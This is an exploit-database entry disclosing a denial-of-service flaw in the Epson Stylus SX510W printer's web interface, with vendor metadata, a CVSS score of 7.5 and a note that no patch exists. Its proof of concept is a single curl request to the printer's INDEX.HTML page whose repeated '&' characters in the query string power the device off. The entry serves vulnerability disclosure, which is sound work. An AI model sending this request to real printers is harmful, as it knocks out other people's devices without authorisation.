Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)

vendor:

Epson Stylus SX510W

by:

Rafael Pedrero

7.5

CVSS

HIGH

Denial of Service (DoS)

CWE

Product Name: Epson Stylus SX510W

Affected Version From: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0

Affected Version To: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Linux/Windows

2020

Epson Stylus SX510W Printer Remote Power Off – Denial of Service (PoC)

The vulnerability occurs when 2 or more &'s are sent to the server in a row ('/PRESENTATION/HTML/TOP/INDEX.HTML') causing it to shutdown.

Mitigation:

This version product is deprecated.

Source

Exploit-DB raw data:

# Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-05-16
# Vendor Homepage: https://www.epson.es/
# Software Link :
https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w
# Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0
# Tested on: Linux/Windows
# Vulnerability Type: Denial of Service (DoS)

1. Description

The vulnerability occurs when 2 or more &'s are sent to the server in a row
("/PRESENTATION/HTML/TOP/INDEX.HTML") causing it to shutdown.

2. Proof of Concept

Request:

curl -s "http://
<printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549"

3. Solution:

This version product is deprecated.

-->